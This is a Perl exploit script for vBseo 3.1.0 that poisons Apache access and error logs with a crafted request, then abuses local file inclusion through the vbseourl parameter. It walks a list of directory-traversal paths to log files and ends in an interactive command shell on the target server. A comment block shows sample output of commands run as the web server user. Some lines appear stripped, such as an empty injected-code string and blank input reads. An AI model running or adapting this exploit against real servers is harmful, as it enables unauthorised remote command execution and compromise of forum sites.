#!/usr/bin/perl #################################################################### # vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit # vendor: http://www.vbseo.com/ # # Author: Jose Luis Gongora Fernandez (a.k.a) JosS # twitter: @JossGongora # mail: joss.xroot(0x40)gmail(0x2e)com # site: http://www.hack0wn.com/ # # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # thanks: CWH Underground # #################################################################### # OUTPUT: # # Trying to Inject the Code... # Successfully injected in ../../../../../../../var/log/apache2/access.log # # [shell]:~$ id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # [shell]:~$ uname -a # Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux # [shell]:~$ exit # joss@h4x0rz:~/Desktop$ use LWP::UserAgent; use IO::Socket; use LWP::Simple; @apache=( "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../etc/httpd/logs/acces_log", "../../../../../../../etc/httpd/logs/acces.log", "../../../../../../../etc/httpd/logs/error_log", "../../../../../../../etc/httpd/logs/error.log", "../../../../../../../var/www/logs/access_log", "../../../../../../../var/www/logs/access.log", "../../../../../../../usr/local/apache/logs/access_log", "../../../../../../../usr/local/apache/logs/access.log", "../../../../../../../var/log/apache/access_log", "../../../../../../../var/log/apache2/access_log", "../../../../../../../var/log/apache/access.log", "../../../../../../../var/log/apache2/access.log", "../../../../../../../var/log/access_log", "../../../../../../../var/log/access.log", "../../../../../../../var/www/logs/error_log", "../../../../../../../var/www/logs/error.log", "../../../../../../../usr/local/apache/logs/error_log", "../../../../../../../usr/local/apache/logs/error.log", "../../../../../../../var/log/apache/error_log", "../../../../../../../var/log/apache2/error_log", "../../../../../../../var/log/apache/error.log", "../../../../../../../var/log/apache2/error.log", "../../../../../../../var/log/error_log", "../../../../../../../var/log/error.log", "../../../../../var/log/access_log", "../../../../../var/log/access_log" ); system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "#######################################################################\n"; print "# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit #\n"; print "#######################################################################\n\n"; if (!$ARGV[0]) { print "Usage: perl exploit.pl [host]\n"; print " perl exploit.pl localhost\n\n"; exit;} $host=$ARGV[0]; $path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necesary # if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;} print "\nTrying to Inject the Code...\n"; $CODE=""; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); if ( $host !~ /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache) { chomp($getlog); $find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $find); $res = $xpl->request($req); $info = $res->content; if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necesary {print "Successfully injected in $getlog \n\n";$log=$getlog; last;} } print "[shell]:~\$ "; chomp( $cmd = ); while($cmd !~ "exit") { $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {print $1;} print "[shell]:~\$ "; chomp( $cmd = ); }